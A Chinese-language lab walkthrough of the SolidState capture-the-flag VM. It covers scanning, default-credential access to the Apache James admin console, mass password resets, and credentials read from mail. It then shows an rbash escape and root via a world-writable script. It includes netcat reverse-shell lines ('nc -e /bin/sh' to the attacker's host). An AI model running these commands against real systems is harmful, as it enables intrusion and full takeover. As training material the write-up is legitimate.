SolidState(**Java Apache Mail server命令执行**)

SolidState(Java Apache Mail server命令执行)

target machine download

scan

1
2
3
4
5
6
22/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp  open  smtp    JAMES smtpd 2.3.2
80/tcp  open  http    Apache httpd 2.4.25 ((Debian))
110/tcp open  pop3    JAMES pop3d 2.3.2
119/tcp open  nntp    JAMES nntpd (posting ok)

80

1
2
3
4
==> DIRECTORY: http://192.168.2.135/assets/                                    
==> DIRECTORY: http://192.168.2.135/images/                                    
+ http://192.168.2.135/index.html (CODE:200|SIZE:7776)                         
+ http://192.168.2.135/server-status (CODE:403|SIZE:301)   

25,简单网络管理协议

这个应该有点意思,nmap --script=auth 192.168.2.135

1
2
3
4
5
6
7
8
9
22/tcp  open  ssh
| ssh-auth-methods: 
|   Supported authentication methods: 
|     publickey
|_    password
|_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
25/tcp  open  smtp
| smtp-enum-users: 
|_  root
  • try2: nmap --script smtp-enum-users.nse -p 25 192.168.2.135

smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 25 192.168.2.135


稍微手工找了一下,nikto、nmap、paros爬行扫描了,但没有什么头绪。

用nessus、appscan扫描下。 1

apache- options内存泄露

Apache httpd 2.4.25 ((Debian)) https://www.exploit-db.com/exploits/42745 https://www.cvedetails.com/google-search-results.php?q=2017-9798

CVE-2017-3167

https://www.cvedetails.com/cve/CVE-2017-3167/?q=CVE-2017-3167


突破点

1
4555/tcp open  james-admin syn-ack ttl 64 JAMES Remote Admin 2.3.2

3

google找到了这个服务的命令执行exp,一看版本也对,于是运行一下。 2

运行完了,不知道是什么情况,提示为“Payload will be executed once somebody logs in.”,于是查看下python脚本。

应该是成功运行的,但没有反弹shell,(⊙﹏⊙)

google下这是什么服务,JAMES Remote Admin 2.3.2

https://wiki.apache.org/james/JamesQuickstart

了解到通过telnet连接,命令台控制。哦哦,了解,能用telnet的就能用nc。用root/root作为口令,成功登入。

4

1
2
help
listusers

user: james user: ../../../../../../../../etc/bash_completion.d user: thomas user: john user: mindy user: mailadmin


分析一下

Currently implemented commands:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
help                                    display this help
listusers                               display existing accounts
countusers                              display the number of existing accounts
adduser [username] [password]           add a new user
verify [username]                       verify if specified user exist
deluser [username]                      delete existing user
setpassword [username] [password]       sets a user's password
setalias [user] [alias]                 locally forwards all email for 'user' to 'alias'
showalias [username]                    shows a user's current email alias
unsetalias [user]                       unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username]               shows a user's current email forwarding
unsetforwarding [username]              removes a forward
user [repositoryname]                   change to another user repository
shutdown                                kills the current JVM (convenient when James is run as a daemon)
quit                                    close connection

查看了以上的命令,貌似不能反弹一个shell。

CVE-2015-7611

找到了一个关于该漏洞的介绍。 https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf

该漏洞,在下一次有用户登陆时候,攻击载荷才会执行。那么这个虚拟机岂不是不能直接命令执行了。不会了,看看wp。


writeup

1
2
3
4
5
6
setpassword james a
setpassword ../../../../../../../../etc/bash_completion.d a
setpassword thomas a
setpassword john a
setpassword mindy a
setpassword mailadmin a

telnet使用post office protocol

1
2
3
4
telnet 192.168.2.135 110
user james
pass a
list

依次登陆6个用户,因为密码已经被改为a了。 登陆../../../../../../../../etc/bash_completion.d,这个用户的时候,发现有两条邮件,正是我执行python exploit的时候发送的。 5

info–mail

1
2
3
4
5
6
7
8
9
10
From: mailadmin@localhost
Subject: New Hires access
John, 

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James
1
2
3
4
5
6
7
8
9
10
11
12
13
14
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

准备提权

ssh mindy@192.168.2.135 P@55W0rd1!2@

当我看到whoami命令,提示-rbash: $'\r': command not found

于是输入help

1
2
3
4
5
6
7
8
9
10
11
GNU bash, version 4.4.12(1)-release (i686-pc-linux-gnu)
These shell commands are defined internally.  Type `help' to see this list.
Type `help name' to find out more about the function `name'.
Use `info bash' to find out more about the shell in general.
Use `man -k' or `info' to find out more about commands not in this list.

A star (*) next to a name means that the command is disabled.

 job_spec [&]                                                 history [-c] [-d offset] [n] or history -anrw [filename] >
 (( expression ))                                             if COMMANDS; then 
省略。。。。。。。。。。。

这个限制的shell,让我想起了以前遇到echo os.system('/bin/bash')

又让我想起了bash破壳漏洞,但是GNU bash, version 4.4.12,版本好像不对。

我想了好久,也没有找到突破rbash的任何方式。

突破限制的shell

一看别人做的,Apparently, you can just execute commands through SSH directly and they will not go through the restricted shell,apparently,这个词严重打击了我的信心(==)

1
2
3
ssh mindy@192.168.2.135 bash
P@55W0rd1!2@
python -c 'import pty; pty.spawn("/bin/bash")'

得到了一个普通权限的shell,( )。゜zzZ真的不容易啊

第二种获得bash-shell的方式

1
2
3
4
5
6
7
8
searchsploit james       #获得py脚本路径
vi /usr/share/exploitdb/exploits/linux/remote/35513.py #修改该脚本的payload
payload = '/bin/nc -e /bin/sh 192.168.2.128 8888' #将这一行,改为用nc反弹sh shell
nc -lnvp 8888 #kali监听

python /usr/share/exploitdb/exploits/linux/remote/35513.py 192.168.2.135 #运行python脚本,将该命令发送的目标主机

ssh mindy@192.168.2.135 #登陆目标主机

1234

信息搜集

gcc没有;suid检查;sudo检查;root权限进程检查

于是四处转悠一下

/var/backups

1
2
3
4
5
-rw------- 1 root root       909 Aug 22  2017 group.bak
-rw------- 1 root shadow     763 Aug 22  2017 gshadow.bak
-rw------- 1 root root      2107 Aug 22  2017 passwd.bak
-rw------- 1 root shadow    1375 Aug 22  2017 shadow.bak

1
2
3
cat /etc/group 查找组用户
james
ps -aux | grep james 查找james用户运行的进程

在/opt路径下,有一个py脚本,被我忽略了。 重点是rwxrwxrwx,第三个rwx,说明其他用户也有可读可写可执行权限。

1
2
3
4
drwxr-xr-x  3 root root 4096 Aug 22  2017 .
drwxr-xr-x 22 root root 4096 Jun 18  2017 ..
drwxr-xr-x 11 root root 4096 Aug 22  2017 james-2.3.2
-rwxrwxrwx  1 root root  158 Dec  2 02:35 tmp.py

提权

cd /opt;echo “os.system(‘/bin/nc -e /bin/bash 192.168.2.128 8001’)” » tmp.py 6

我说为啥一开始传LinEnum.sh的时候,文件老是不见了呢==

原来是删除/tmp的进程做的。

权限错误,这种提权方式遇到过


参考资料:

将一个简单的shell,提升为完整的终端控制

总结:

因为全端口扫描需要花点时间,所以先进行常见端口扫描。

写了一个脚本,懒得每次输命令==

1
2
3
4
#!/bin/bash
read -p "ip? " what
nmap -sS -sV -oN scan-result.txt ${what}
nmap -p- -oN full-scan.txt ${what}
  • 内核提权检查之前,先检查是否有编译器